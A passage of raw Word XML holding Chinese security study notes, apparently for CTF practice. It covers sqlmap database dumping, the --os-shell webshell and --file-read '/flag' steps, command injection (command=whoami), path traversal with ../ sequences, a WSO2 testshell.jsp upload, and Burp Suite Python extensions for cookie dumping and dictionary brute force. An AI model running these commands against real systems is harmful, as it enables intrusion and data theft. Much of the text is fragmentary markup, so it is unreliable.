            <wp:docPr id="76" name="图片 76" descr="屏幕截图 2023-06-24 1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3-06-24 1353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210" w:leftChars="100" w:right="0" w:firstLine="210" w:firstLineChars="10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使用方式：先在cmd运行msfconsole指令，打开msfs后输入search joomla，注意带registration的部分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770" cy="3476625"/>
            <wp:effectExtent l="0" t="0" r="1270" b="13335"/>
            <wp:docPr id="83" name="图片 83" descr="屏幕截图 2023-06-24 14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屏幕截图 2023-06-24 14094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输入use 上面白色区域代码，即可打开joomla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733800" cy="396240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="92" name="图片 92" descr="屏幕截图 2023-06-24 14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3-06-24 1413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输入search CVE-2015-7297 查看到一处存在可SQL注入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1403985"/>
            <wp:effectExtent l="0" t="0" r="3810" b="13335"/>
            <wp:docPr id="94" name="图片 94" descr="屏幕截图 2023-06-24 14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3-06-24 14274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28" w:name="_Toc18522"/>
      <w:bookmarkStart w:id="29" w:name="_Toc29301"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/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在kali中，输入sqlmap -u url地址查看存在GET请求参数的检测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30140" cy="2331720"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="95" name="图片 95" descr="屏幕截图 2023-06-24 1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3-06-24 1620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--data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查看存在POST请求参数的检测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23460" cy="2331720"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="96" name="图片 96" descr="屏幕截图 2023-06-24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3-06-24 1626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输入sqlmap -u url地址 --cookie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参数信息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查看存在cookie参数的检测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800600" cy="2301240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="97" name="图片 97" descr="屏幕截图 2023-06-24 16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3-06-24 16333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获取数据库名称：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--dbs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获取当前所在数据库信息：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--current-db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获取当前数据库所有表信息：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--tables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获取当前数据表所有列信息：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--columns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获取当前表多个数据字段所有数据信息：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--dump -C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列名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-T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数据表名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（这里会提示是否对其中哈希值进行进一步破解，再之后会提示是否根据字典破解）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获取当前数据库数据量信息：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--count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数据库名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获取当前用户权限信息：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--privileges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连接数据库：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对数据库SQL执行管理：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--sql-shell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(之后可以进行SQL操作了，比如@@version：查看数据库版本)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延时注入：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-safe-freq或者sqlmap.py -d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数据库连接串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-delay 1（延时1秒）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获取用户：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--os-cmd-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net user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，之后选择网站类型和保存文件位置，分别输入对应数字即可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写Webshell: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--os -shell，之后选择语言类型对应数字，之后选择2，之后输入保存文件路径，之后不输入按回车即可得到写Webshell的文件路径，可在浏览器访问，之后输入net user可以查看信息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大小写注入：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--tamper=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randomcase.py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</w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars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批量检测（这里request的请求集合文件路径可由BurpSuite的Logging功能得到，具体见BurpSuite部分笔记）：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sqlmap.py -l request的请求集合文件路径 --batch -smart（batch：自动选择yes，smart：启发式快速判断，节约时间）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注入显示信息级别：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sqlmap.py -u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url地址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-v 3（-v后数字从0-6依次显示更多信息）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420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利用本地burpsuite截取的请求爆库：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文件内容类似：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object>
          <v:shape id="_x0000_i1025" o:spt="75" type="#_x0000_t75" style="height:35pt;width:25.85pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId161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60">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:objec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爆库（表，字段，内容同理）：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--dbs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4861560" cy="2750820"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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69180" cy="2141220"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="1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如果存在已知的存在漏洞的参数名，需要改为：</w:t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sqlmap -r 文件名 -p 参数名 --dbs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="2134870"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1397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3875"/>
            <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
            <wp:docPr id="1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爆flag文件内容：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLine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sqlmap -r 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文件名 </w:t>
      </w:r>
      <w:r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  <w:t>--file-read "/flag" --dbms mysql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="2236470"/>
            <wp:effectExtent l="0" t="0" r="1905" b="3810"/>
            <wp:docPr id="1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62990"/>
            <wp:effectExtent l="0" t="0" r="3810" b="381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30" w:name="_Toc7012"/>
      <w:bookmarkStart w:id="31" w:name="_Toc27099"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="3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正向跟踪：搜索request.getParameter、HttpServletRequest、RequestMapping、request.getPart等获取输入数据的地方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2" w:name="_Toc29494"/>
      <w:bookmarkStart w:id="33" w:name="_Toc26134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1.SQL注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="3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利用单引号闭合注入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4" w:name="_Toc5215"/>
      <w:bookmarkStart w:id="35" w:name="_Toc2126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2.命令执行漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="3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全局寻找网站代码中是否存在类似command等参数提供注入的地方（一般后续代码中包含cmd、bash等指令操作的代码）。使用BurpSuite截取POST请求，下方增加参数（假设叫command）：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command=whoami查看用户信息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command=ipconfig查看IP地址信息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36" w:name="_Toc3166"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）WSO2漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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脚本如下，在burpsuite中拦截请求全选并粘贴使用，注意替换里面的HOST地址，之后放过拦截，会运行并生成上传authenticationendpoint/testshell.jsp文件，访问：URL地址前缀/authenticationendpoint/testshell.jsp得到上传cmd指令的网页，输入ls，cat /flag等指令得到信息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pt;width:40.05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68">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:objec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7" w:name="_Toc9398"/>
      <w:bookmarkStart w:id="38" w:name="_Toc1233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3.文件操作漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="3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upload、download等参数提供注入的地方，使用BurpSuite截取文件下载请求，之后可以在路径前加入../../../../../../../../../切换到根目录，然后追加输入指定文件的目录位置可以下载指定路径的文件</w:t>
      </w:r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39" w:name="_Toc3884"/>
      <w:bookmarkStart w:id="40" w:name="_Toc923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4.代码注入漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="4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全局寻找网站代码中是否存在类似compile等参数提供注入的地方，使用BurpSuite截取文件下载请求，之后可以在参数输入文件操作指令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41" w:name="_Toc22660"/>
      <w:bookmarkStart w:id="42" w:name="_Toc32305"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc4290"/>
      <w:bookmarkStart w:id="44" w:name="_Toc4809"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>python安全应用编程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc24509"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）正则表达式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45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35pt;width:62.35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70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785" cy="2898775"/>
            <wp:effectExtent l="0" t="0" r="8255" b="12065"/>
            <wp:docPr id="100" name="图片 100" descr="屏幕截图 2023-07-01 22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3-07-01 22580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6" w:name="_Toc15959"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（二）Web编程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46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8" o:spt="75" type="#_x0000_t75" style="height:35pt;width:55.25pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId174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7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727835"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="101" name="图片 101" descr="屏幕截图 2023-07-02 0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3-07-02 00015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202815"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="102" name="图片 102" descr="屏幕截图 2023-07-02 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3-07-02 00002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2385060"/>
            <wp:effectExtent l="0" t="0" r="8890" b="7620"/>
            <wp:docPr id="103" name="图片 103" descr="屏幕截图 2023-07-02 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07-02 00004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1294765"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635"/>
            <wp:docPr id="104" name="图片 104" descr="屏幕截图 2023-07-02 13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07-02 13100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本地启一个Web服务，运行后可以使用ip端口带参数访问网址了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9" o:spt="75" type="#_x0000_t75" style="height:35pt;width:55.25pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId18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79">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:objec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75205"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1079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25240" cy="5692140"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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综合：爬虫获取网站多页制定内容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5420" cy="3053715"/>
            <wp:effectExtent l="0" t="0" r="7620" b="9525"/>
            <wp:docPr id="105" name="图片 105" descr="屏幕截图 2023-07-02 13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07-02 13333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851785"/>
            <wp:effectExtent l="0" t="0" r="1905" b="13335"/>
            <wp:docPr id="106" name="图片 106" descr="屏幕截图 2023-07-02 13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07-02 1334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7" w:name="_Toc24854"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（三）多线程(队列)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/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0" o:spt="75" type="#_x0000_t75" style="height:35pt;width:68.95pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId186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8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3070860"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="107" name="图片 107" descr="屏幕截图 2023-07-02 21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07-02 21193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48" w:name="_Toc20583"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（四）网络编程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48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首先查看kali的IP地址：cmd输入ifconfig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00600" cy="647700"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="108" name="图片 108" descr="屏幕截图 2023-07-02 22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07-02 22300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将客户端的python代码放到kali的Home文件夹下，并在cmd使用python 文件名启动（注意kali里的python文件不能有注释，否则报错）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1" o:spt="75" type="#_x0000_t75" style="height:35pt;width:87.7pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId190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18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1697355"/>
            <wp:effectExtent l="0" t="0" r="3175" b="9525"/>
            <wp:docPr id="109" name="图片 109" descr="屏幕截图 2023-07-02 22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07-02 2235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之后启动主机win10下的服务端的python代码，可以在kali的运行python中发现请求的IP地址信息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32" o:spt="75" type="#_x0000_t75" style="height:35pt;width:90.25pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId193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19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337050"/>
            <wp:effectExtent l="0" t="0" r="3175" b="6350"/>
            <wp:docPr id="110" name="图片 110" descr="屏幕截图 2023-07-02 22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07-02 22413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之后客户端发送请求就能够得到响应了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016125"/>
            <wp:effectExtent l="0" t="0" r="11430" b="10795"/>
            <wp:docPr id="111" name="图片 111" descr="屏幕截图 2023-07-02 22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07-02 22442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49" w:name="_Toc24550"/>
      <w:bookmarkStart w:id="50" w:name="_Toc569"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Burp Suite基于python插件开发</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc6696"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）环境配置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/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在Burp Suite中选择Extender-Options-Python Environment配置jython的文件位置（jython是用来将python转换为java的文件）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764155"/>
            <wp:effectExtent l="0" t="0" r="14605" b="9525"/>
            <wp:docPr id="112" name="图片 112" descr="屏幕截图 2023-07-03 23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07-03 23274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官方文档已经导出到本地文件夹中：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813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2" w:name="_Toc1050"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（二）Burp Suite使用Python脚本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/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编写python脚本如下，之后在Extensions中点击Add，选择文件类型为Python，点击Select file...导入python脚本，点击打开：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33" o:spt="75" type="#_x0000_t75" style="height:35pt;width:52.25pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId199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198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#导入接口类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print("Hello Burp!")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947920"/>
            <wp:effectExtent l="0" t="0" r="1270" b="508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之后程序自动运行并在Output中输出结果，如果有错误会在Errors中输出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958080"/>
            <wp:effectExtent l="0" t="0" r="13970" b="1016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3" w:name="_Toc17207"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（三）自定义Burp Suite插件名称</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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自定义插件名称，编写脚本如下，可以看到导入后名称编程了代码里指定的名称：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1034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20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#定义接口类，按要求继承相关接口(IBurpExtender)，并命名为BurpExtender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#调用接口方法，注册registerExtenderCallbacks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32585"/>
            <wp:effectExtent l="0" t="0" r="6350" b="13335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4" w:name="_Toc6260"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（四）自定义Burp Suite插件并引入到菜单项</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54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自定义插件引入到邮件菜单项中，含有二级菜单，并且通过二级菜单出发函数执行操作，点击调用函数的二级菜单，在output中可以看到函数执行的结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1035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6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20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IBurpExtender,IContextMenuFactory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javax.swing import JMenuItem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IContextMenuFactory):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callbacks.registerContextMenuFactory(self)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createMenuItems(self, invocation):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 = []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 = JMenu("Hello I an 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subMenu_1 = JMenuItem("I am subMenu")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main_menu.add(subMenu_1)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subMenu_2 = JMenuItem('Send to other Method',actionPerformed=self.run)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main_menu.add(subMenu_2)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menu_list.append(main_menu)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menu_list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run(self, event):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print(event)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print('Menu run.')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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440305"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1333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5" w:name="_Toc1198"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（五）自定义Burp Suite插件获取cookies信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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脚本获取cookies信息，通过监听浏览器的网页操作得到cookies信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1036" o:spt="75" type="#_x0000_t75" style="height:35pt;width:52.25pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId209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208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IBurpExtender,ICookie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ICookie):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self._callbacks = callbacks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cookies = self._callbacks.getCookieJarContents()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self.cookiesInformations(cookies)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cookiesInformations(self, cookies):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i in cookies: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 i.getDomain()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print(i.getName() + ':' + i.getValue())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477645"/>
            <wp:effectExtent l="0" t="0" r="10160" b="635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6" w:name="_Toc20767"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（六）自定义Burp Suite插件使用官方文档提供方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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Burp Suite官方文档提供了很多工具方法，例如Base64编码等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1037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2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21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burp import IBurpExtender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BurpExtender(IBurpExtender):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self._helps = callbacks.getHelpers()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print(self._helps.base64Encode("MyExten"))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5680" cy="1653540"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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31136"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（七）自定义Burp Suite插件完全删除所有相关项</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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在删除或者取消插件时，如果需要将插件生成的相关文件信息全部删除，那么使用如下脚本即可实现全面清除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1038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5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21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IExtensionStateListener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IExtensionStateListener):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callbacks.registerExtensionStateListener(self)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extensinUnloaded(self):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print("MyExten Unloaded!")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58" w:name="_Toc21265"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（八）自定义Burp Suite插件获取HTTP请求信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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脚本监听获取HTTP请求信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1039" o:spt="75" type="#_x0000_t75" style="height:35pt;width:52.25pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId217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216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reqMsg = self._helpers.bytesToString(messageInfo.getRequest())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print("Http Requests:" + reqMsg)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00805"/>
            <wp:effectExtent l="0" t="0" r="5715" b="63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59" w:name="_Toc6291"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（九）自定义Burp Suite插件获取HTTP和HTTPS的Host、Port、Protocol</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/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脚本监听Http或者Https的Host、port以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1040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0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21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#coding=utf-8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#导入接口类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from burp import IBurpExtender, IHttpListener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class BurpExtender(IBurpExtender, IHttpListener):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#也可以调用python方法，实现打印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print("Python: World")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#将自己注册为HTTP监听器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callbacks.registerHttpListener(self)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def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):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IHttpService = messageInfo.getHttpService()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print("Host:\t", IHttpService.getHost())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print("Port:\t", IHttpService.getPort())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print("Protocol:\t", IHttpService.getProtocol())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576320"/>
            <wp:effectExtent l="0" t="0" r="4445" b="508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0" w:name="_Toc12919"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（十）自定义Burp Suite插件使用本地字典爆破</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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编写脚本实现自己的Intruder，并在本地创建字典.txt。将Burp Suite拦截的请求发送到Intruder，在Positions中设置好变量，之后在Payloads中将Payload Sets中的Payload type设置为Extension-generated，再点击Payload Options-Select generated，就能发现脚本中编写的My Intruder，选择后点击OK，点击Start Attack进行字典内容的遍历爆破</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1041" o:spt="75" type="#_x0000_t75" style="height:35pt;width:52.25pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId223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222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2" o:spt="75" type="#_x0000_t75" style="height:35pt;width:57.8pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId225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22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IIntruderPayloadGeneratorFactory, IIntruderPayloadGenerator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IIntruderPayloadGeneratorFactory):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callbacks.registerIntruderPayloadGeneratorFactory(self)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createNewInstance(self, attack):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mtattack = attack.getHttpService()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template = attack.getRequestTemplate()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IntruderPayloadGenerator()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getGeneratorName(self):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Intruder'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IntruderPayloadGenerator(IIntruderPayloadGenerator):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 = open('pwd_192.txt', 'r')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self.payload = [i.strip() for i in f]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f.close()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self.count = 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self.flag =True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hasMorePayloads(self):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self.flag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#baseValue为Position中标记的基准值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getNextPayload(self,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len(self.payload) &gt; self.count + 1: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self.count +=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print(self.payload[self.count])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self.payload[self.count]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self.flag = false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rest(self):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字典文件我就只写了1、2、3，根据需求使用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33040"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1016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929255"/>
            <wp:effectExtent l="0" t="0" r="1905" b="12065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20595"/>
            <wp:effectExtent l="0" t="0" r="5715" b="444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1" w:name="_Toc17853"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（十一）自定义Burp Suite插件使用Python脚本处理过的本地字典内容爆破</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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脚本编写自己的Intruder并批量处理字典内容后爆破，还是先在Intruder-Payloads-Payload type设置为Simple list，之后在Payload Options中选择Load...上传字典，再点击Payload Processing中的Add按钮，选择Invoke Burp extension后可以看到脚本中的My Processor，选择后点击OK，这里爆破可以看到脚本中base64编码处理过的内容进行了爆破</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1043" o:spt="75" type="#_x0000_t75" style="height:35pt;width:52.25pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId230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229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#coding=utf-8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#导入接口类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burp import IBurpExtender, IIntruderPayloadProcessor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base64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BurpExtender(IBurpExtender, IIntruderPayloadProcessor):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registerExtenderCallbacks(self, callbacks):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self._helpers = callbacks.getHelpers()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callbacks.setExtensionName("MyExten")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#将自己注册为IntruderPayloadGeneratorFactory监听器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callbacks.registerIntruderPayloadProcessor(self)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getProcessorName(self):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'My Processor'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processPayload(self, currentPayload, originalPayload, baseValue):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currentPayload = self._helpers.bytesToString(currentPayload)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newPayload = base64.b16encode(currentPayload)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newPayload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24935"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985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061335"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1905"/>
            <wp:docPr id="1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  <w:ind w:leftChars="0"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc18569"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>自定义Web服务&amp;快速找出IP地址泄露</w:t>
      </w:r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本地起一个ip端口网址，效果见八-1-(2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1044" o:spt="75" type="#_x0000_t75" style="height:35pt;width:55.25pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
